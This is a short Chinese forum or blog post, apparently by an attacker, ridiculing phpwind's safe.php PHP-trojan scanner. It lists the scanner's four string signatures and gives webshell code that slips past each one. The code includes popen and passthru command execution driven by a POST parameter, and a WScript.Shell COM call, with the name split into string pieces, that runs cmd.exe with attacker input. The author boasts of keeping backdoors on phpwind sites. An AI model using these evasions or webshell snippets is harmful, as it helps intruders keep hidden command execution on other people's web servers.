看看phpwind官方的介绍!!我不得不好奇的来看看。道怎么比魔高了?
-----------------------------------------
服务器 php 木马, 恶意程序查杀工具(适用于1.3.6 与 2.0.1 版被攻击站点的安全检测)
使用后99%可以根除您空间上的恶意程序与 php木马程序
-----------------------------------------
哎,看来phpwind的开发人员在这方面有点愚笨,我来一句一句分析一下safe.php文件的核心。
1、strpos($a,'shell_exec')!==false
如果包含shell_exec,杀
我这样绕过:
-------------
system();
-------------
passthru();
-------------
exec();
-------------
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
-------------
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
2、strpos($a,'eval($_')!==false
如果包含eval($_,杀
我这样绕过:
eval($a);
3、strpos($a,'move_uploaded_file($_FILES')!==false
如果包含move_uploaded_file($_FILES,杀
我这样绕过:
move_uploaded_file($a,$b);
4、strpos($a,'copy($_FILES')!==false
如果包含copy($_FILES,杀
我这样绕过:
copy($a,$b);
完了!!就这样结束了!全部绕过了!后门继续留着。唉。真的不知道这个工具有什么用,骗骗菜鸟站长?为什么只能用在phpwind的站点?又怎么99%根除恶意程序了??
到我这里应该是99.999999%不能根除恶意程序!!!使用这个和不使用简直没分别。希望我手头没有各位PHPWIND站长的后门哦。不要以为有了这个safe.php就高枕无忧了。嘻嘻。道高一尺,魔绝对要高一丈的……改变不了的事实。
